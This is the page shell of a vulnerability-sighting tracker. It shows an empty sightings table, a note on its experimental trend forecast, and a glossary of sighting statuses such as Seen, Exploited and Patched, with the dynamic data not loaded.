Loading…
Trend slope:
-
(linear fit over daily sighting counts)
Show additional events:
Loading…
Experimental. This forecast is provided for visualization only and may change without notice. Do not use it for operational decisions.
Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.
Sightings
| Author | Source | Type | Date | Other |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…